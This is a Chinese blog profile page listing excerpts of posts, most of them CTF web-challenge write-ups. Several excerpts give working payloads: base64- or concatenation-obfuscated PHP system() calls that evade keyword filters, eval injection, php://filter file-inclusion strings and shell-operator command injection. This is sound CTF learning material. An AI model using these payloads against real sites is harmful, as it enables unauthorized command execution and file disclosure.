自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 自制GUI

包含了 sqlmap GUI Xray GUI dirmap GUI

2022-06-18 14:56:37 193

原创 gitlab可以访问,但git clone连接超时不能下载

因此,我们可以把 http://wozhendetainanle/map 地址后面加上 .git后缀,更改为:http://wozhendetainanle/map.git此时使用就可以下载了

2022-05-06 18:32:42 674

原创 渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

2022-05-06 17:43:41 1188

原创 py爬虫图片

#首先导入所需的库import requestsfrom bs4 import BeautifulSoup import timefor i in range(2,200): #爬取第2页到第200页的壁纸 url = f"http://www.netbian.com/index_{i}.htm" headers = { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Ge...

2022-04-27 22:58:29 97

原创 [第二章 web进阶]文件上传]

先看一下题目源码:<?phpheader("Content-Type:text/html; charset=utf-8");// 每5分钟会清除一次目录下上传的文件require_once('pclzip.lib.php');if(!$_FILES){ echo '<!DOCTYPE html><html lang="zh"><head> <meta charset="UTF-8" /> <

2021-08-08 03:25:47 926

原创 [HCTF 2018]WarmUp

打开靶场后,查看源码即可看到<!--source.php--><?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if...

2021-08-06 23:49:06 196 1

原创 十五、web16 备份是个好习惯

常用备份文件后缀:.swp,.bak之前也做过相关题目 所以想到了 index.php.bak下载源代码<?php/*** Created by PhpStorm.* User: Norse* Date: 2017/8/6* Time: 20:22*/include_once "flag.php"; //包含flag.phpini_set("display_errors", 0);$str = strstr($_SERVER['REQUEST_URI'],...

2021-08-03 22:45:32 76

原创 [ACTF2020 新生赛] Exec

直接ping ip可以得到结果,试一下:拿到flag。像这种什么都没过滤的题目,可以利用常见管道符直接执行命令:常见管道符1、|(就是按位或),直接执行|后面的语句2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句3、&(就是按位与),&前面和后面命令都要执行,无论前面真假4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令这里没试出来flag,用cmd试一...

2021-08-02 01:39:34 137

原创 【ACTF2020】 新生赛]Include

本题主要考查了利用php://filter伪协议进行文件包含进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接)首先考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路重新考虑之后使用 "php://filter"伪协议" 来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。构造Payload: ?file=php://filter/rea

2021-08-02 01:07:08 191

原创 | 和 ||,& 和 && 的区别

我们将 || 和 && 定义为逻辑运算符,而 | 和 & 定义为位运算符。&& 如果两个操作数都非零,则条件为真;|| 如果两个操作数中有任意一个非零,则条件为真。& 按位与操作,按二进制位进行"与"运算。运算规则:(有 0 则为 0)0&0=0; 0&1=0; 1&0=0; 1&1=1;| 按位或运算符,按二进制位进行"或"运算。运算规则:(有 1 则为 1)0|0=0;

2021-07-21 01:43:08 65

原创 [Ctf show web] 萌新计划12

阿呆做的很绝吧文件名都给过滤了利用baes64加密绕过?c=$a=base64_decode("c3lzdGVt");$b=base64_decode("dGFjIGNvbmZpZy5waHA=");$a($b);

2021-07-20 04:43:00 234 1

原创 【Ctf show web】萌新计划10

这题用上一题的方法已经不行了已经隐蔽了相关单词我们用拼凑语句 写出payload?c=$a='sys';$b='tem';$d=$a.$b;$d('tac config.php');

2021-07-20 04:16:14 362

原创 [Ctf show web]萌新计划9

preg_match (A,B) 要求B包含Apreg_match($a,$b) 函数可以返回$a匹配次数,它的值将是 0 次(不匹配)或 1 次,因为 preg_match() 在第一次匹配后将会停止搜索。eval($c) 这个是最后的输出 是flag题目上面有说明 flag in config.php 说明flag在config.php里构造?c=highlight_file('./config.php')...

2021-07-20 03:22:05 235 2

原创 【Bugku web】变量1

打开网页-主要代码 preg_match 执行匹配正则表达式把args设置为全局变量即可?args=GLOBALS 即可

2021-07-19 23:57:52 101

原创 [Bugku web] eval

打开网页是相关代码 能看出flag就在 flag.php这个文件中include 打开包含 flag.php这个文件定义a= 上传的hello的值eval 字符串转化为php代码var_dump($a) 查看a的字符类型并输出a1.?hello=system(cat 'flag.php') 后查看网页源码2.?hello=1,$b=flie('./flag.php'),print_r($b) 源代码要求提交一个hello 这边hello定义为1 定义b为flag.php这个...

2021-07-19 23:11:26 258

原创 【Bugku web】bp

题目提示密码为“zxc???”,猜测密码为zxc开头的6位字符串。随意输入密码后,对返回界面进行源代码审计。发现脚本如下<script>var r = {code: 'bugku10000'}if(r.code == 'bugku10000'){console.log('e');document.getElementById('d').innerHTML = "Wrong account or password!";}else{console.log('0')

2021-07-16 17:33:44 891 3

原创 【Bugku web】 本地管理员

打开网址后 尝试登录需要伪造ip打开插件X-Forwarded-For HeaderIP设置为127.0.0.1查看网页源代码 发现线索 baes64解码test123尝试用户名为admin 密码 test123 后成功登录得到flag

2021-07-16 15:32:02 148

原创 【Bugku web】 网站被黑

描述有相关提示 会有后面 用御剑扫描一下有个shell.php的网址打开后 burp爆破即可 密码是 hack

2021-07-16 14:54:46 125

原创 【bugku】web game1 来盖楼啊

ps萌新第一次写wp如有不足请大佬指点打开网址 是一个盖楼游戏老规矩先玩几把Fn+F12 查看源码发现相关信息 xmlhttp.open 括号里面提交的值等于正确 那么打开score.php这个文件嗯 是get传参 去网络信息那边看看这里的sign是baes64编码过的 加上了格式 sign=zM+baes64(score的值)+==反复试玩后发现网络 最底部一个消息头有相关消息我们双击打开 试试看要提交相关数值与服务器里的值匹配后 才能打...

2021-07-16 14:32:53 323

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除